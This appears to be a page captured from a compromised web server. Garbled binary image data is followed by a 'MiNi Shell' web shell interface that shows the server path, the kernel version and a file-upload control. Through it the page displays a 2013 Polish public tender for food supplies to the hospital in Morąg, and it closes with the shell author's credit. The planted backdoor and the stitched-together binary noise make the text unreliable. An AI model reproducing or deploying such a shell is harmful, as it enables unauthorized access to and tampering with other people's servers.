JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131218/526618-N-2013.html

<p class="kh_header"><b>Morąg: Dostawa artykułów spożywczych do Szpitala Miejskiego w Morągu Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 526618 - 2013; data zamieszczenia: 18.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Morągu Spółka z ograniczoną odpowiedzialnością , ul. Dąbrowskiego 16, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 89 7574231, faks 89 7574593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozmorag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Sp.zo.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do Szpitala Miejskiego w Morągu Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet  I .Pieczywo
1.Chleb  zwykły krojony	 kg	9000
2.Chleb razowy	kg	900
3.Bułka tarta kg	90
Pakiet  II . Mleko i jego przetwory
1.Mleko UHT 2 % tłuszczu karton l 11000
2.Śmietana  ukwaszona 18 % tł.(400 ml)	l250
3.Masło  śmietankowe  82 % tł.	kg	350
4.Twaróg  półtłusty	kg	770
5.Ser  żółty pełnotłusty kg	480
6.Ser  topiony  śmietankowy  (trójkąt)szt	1200
7.Ser  topiony  śmietankowy (plastry)szt	1200
8. Ser topiony kostka	szt	1200
9. Masło roślinne 0,25 kg	kg	350
Pakiet  III .Produkty zbożowe i ich przetwory
1.Mąka  pszenna  typ 550	kg	650
2.Mąka  ziemniaczana	kg	120
3.Płatki owsiane zwykłe	kg	400
4.Płatki jęczmienne zwykłe 	kg	400
5.Ryż biały	kg	650
6.Makaron świderki	kg	400
7.Makaron  krajanka	kg	400
8.Kasza manna	kg	500
9.Kasza jęczmienna 	kg	480
10.Kasza jęczmienna pęczak	kg	60
11.Kasza gryczana	kg	60
12.Kleik ryżowy ( 170 g)	szt	400
Pakiet  IV . Tłuszcze 
1.Olej rzepakowy  1 l	szt	480
2.Majonez 280 g	szt	150
Pakiet V .Cukier
1.Cukier paczkowany 	kg	1000
2.Cukier puder  (0,4 kg)	kg	20
Pakiet VI.Wędliny
1.Polędwica z warzywami	kg	300
2.Szynka drobiowa z fileta	kg	300
3.Szynka drobiowa mielona     kg	300
4.Szynka wieprzowa mielona	kg	300
5.Luncheon kg	300
6.Parówki cienkie -powyżej 50 % mięsa	kg	300
7.Kiełbasa zwyczajnakg	50
8.Pasztetowa drobiowa 	kg	500
9.Pasztet pieczony  z indyka	kg	500
10.Szynka konserwowa	kg	400
11.Kiełbasa krakowska parzona kg	300
12.Boczek  wędzony kg	50
13.Smalec wieprzowy  kostka  0,25 kg	50
Pakiet VII.Przyprawy i inne produkty spożywcze
1.Sól  warzona miałka 	kg	400
2.Kwasek cytrynowy  20 g	szt	360
3.Przyprawa  jarzynka 200 g	szt	400
4.Majeranek 20 g	szt	120
5.Pieprz ziołowy  20 g	szt	200
6.Pieprz  naturalny mielony  20 g	szt	200
7.Przyprawa  maggi 1 l	szt	180
8.Cukier waniliowy  16 g	szt	200
9.Musztarda serepska 180 g	szt	300
10.Kisiel  40 g	szt	1000
11.Kawa  zbożowa  0,5 kg	kg	200
12.Fasola  Jaś	kg	100
13.Fasola biała drobna	kg	90
14.Groch połówki	kg	90
15.Herbata  granulowana 100 g	kg	14
16.Herbata ekspresowa 100 szt 	op	12
17.Liść  laurowy  18 g	op	100
18.Ziele angielskie 20 g	op	200
19.Miód  (jednorazowe opakowanie 25 g)	szt	1 300
20.Ocet  0,5 l	szt	1000
21.Kakao naturalne ciemne 100 g	kg	20
22.Koper  suszony   ( 200 g)	kg	5
23.Pietruszka nać suszona ( 200 g)	kg	5
24.Woda mineralna gazowana  1,5 l	szt	2500
25.Woda mineralna niegazowana 1,5 l	szt	2500
26.Cynamon mielony (20 g)	szt	50
27.Papryka  słodka ( 20 g) 	szt	100
28.Żelatyna (50 g)	szt	100
29.Budyń (40 g)	szt	500
30.Syrop -sok   (1 l)	szt	100
31.Chrupki  kukurydziane ( 250 g)	szt	300
32.Herbatniki  paczkowane( 100 g)	szt	300
33.Płatki  kukurydziane (1 kg )	szt	200
34.Sałatka szwedzka - (słoik  400 -500 g)	szt	200
35.Biszkopty okrągłe 500 g	szt	50
36.Zioła  prowansalskie  (10g)	szt	60
37.Przyprawa do kurczaka	szt	60
38.Czosnek granulowany (20 g)	szt	60
39.Pieprz czarny ziarnisty (20 g )	szt	200
Pakiet VIII.Ryby
1.Panga  biała	kg	360
Pakiet IX.Mrożonki
1.Kalafior  mrożony	        kg480
2. Fasolka szparagowa zielona cięta  mrożona 	        kg	480
3.Mieszanka warzywna 7 składnikowa 	        kg 240
4.Mieszanka kompotowa 	kg	160
5.Brokuł   mrożony kg	480
6.Szpinak kg	300
Pakiet X.Mięso
1.Łopatka wieprzowa b/k	kg	1000
2.Schab z/k	kg	200
3.Karkówka  wieprzowa  z kością 	kg	200
4.Boczek surowy kg	120
5.Żeberka paski	kg	100
Pakiet XI.Drób
1.Kurczak świeży 	kg	600
2.Ćwiartka - kurczaka	kg	1000
3.Porcja rosołowa	kg	480
4.Wątróbka  drobiowa  z  indyka  	kg	200
5.Wątróbka drobiowa z kurczaka	kg	200
6.Filet z piersi  kurczaka 	kg	200
Pakiet XII.Warzywa
1.Ziemniaki	kg 	12000
2.Marchew 	kg	6000
3.Seler	kg	500
4.Pietruszka	kg	500
5.Buraki  ćwikłowe 	kg	3000
6.Por	kg	240
7.Kapusta biała 	kg	600
8.Jabłka	kg	2000
9.Cebula	kg	120
10.Kapusta  pekińska 	kg	300
11.Pieczarka 	kg	100
Pakiet XIII.Warzywa kiszone
1.Ogórek kiszony	kg	120
2.Kapusta kiszona	kg	120
Pakiet XIV.przetwory owocowe i warzywne
1.Dżem  poj. 260 g	szt.	300
2.Dżem(jednorazowe opakowanie 25 g)	szt	2600
3.Groszek konserwowy  400 g	szt	600
4.Kukurydza konserwowa 400 g	szt	600
5.Koncentrat pomidorowy 0,9 l  - 30%	szt	300
6.Koncentrat pomidorowy  180 g - 30 %	szt	300
Pakiet XV.Jajka 
1.Jajka  kat. L	szt 15 000
Pakiet XVI.Warzywa i  owoce  sezonowe 
1.Sałata  zielona  	główka	400
2.Pietruszka nać	pęczek	300
3.Koper zielony	pęczek	300
4.Szczypior	pęczek	100
5.Rzodkiewka	pęczek	200
6.Botwina 	pęczek 	300
7.Ogórek zielony	kg	200
8.Pomidor	kg	200
9.Truskawki	kg	200.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.51.10.00-3, 15.61.33.00-1, 15.40.00.00-2, 15.83.00.00-5, 15.13.11.30-5, 15.87.00.00-7, 15.22.10.00-3, 15.33.11.00-8, 15.11.00.00-2, 15.11.20.00-6, 15.30.00.00-1, 15.33.21.00-5, 15.33.10.00-7, 03.14.25.00-3, 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących  tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących  tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących  tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących  tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących  tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie o  obowiązujących w  zakładzie zasadach systemu HACCP - analizy zagrożeń i    krytycznych  punktów kontroli Nie dotyczy zadania 12
 - decyzję  o przystosowaniu środka transportu do przewożenia artykułów  spożywczych    Nie dotyczy zadania12</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz ofertowy i cenowy  - załącznik nr 1 i 2 do SIWZ
2.W przypadku, gdy umocowanie do reprezentowania wykonawcy nie wynika ze  stosownego   dokumentu, a w szczególności z odpisu z właściwego rejestru, należy załączyć stosowne pełnomocnictwo. 

3. Lista podmiotów należących do tej samej grupy kapitałowej o której mowa w art.24 ust.2 pkt 5, albo informacje o tym że nie należy do grupy kapitałowej-wg wzoru załącznik nr 7 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a /zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena   netto  pozostanie bez  zmian; 
b/Zmiany wymienione w ppkt a), następują z mocy prawa i obowiązują od dnia obowiązywania odpowiednich przepisów
c/ strony dopuszczają zmianę cen jednostkowych asortymentu objętego umową  w przypadku   zmiany wielkości opakowania wprowadzonej przez producenta  z zachowaniem zasady  proporcjonalności w stosunku do ceny objętej umową.
d/ przedłużenia terminu obowiązywania umowy do chwili wyczerpania się wartości umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozmorag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Morągu Sp z o.o.
Dąbrowskiego 16 
14-300 Morąg
budynek administracji pokój nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2014 godzina 11:45, miejsce: Szpital Miejski w Morągu Sp z o.o.
Dąbrowskiego 16 
14-300 Morąg
budynek administracji pokój nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com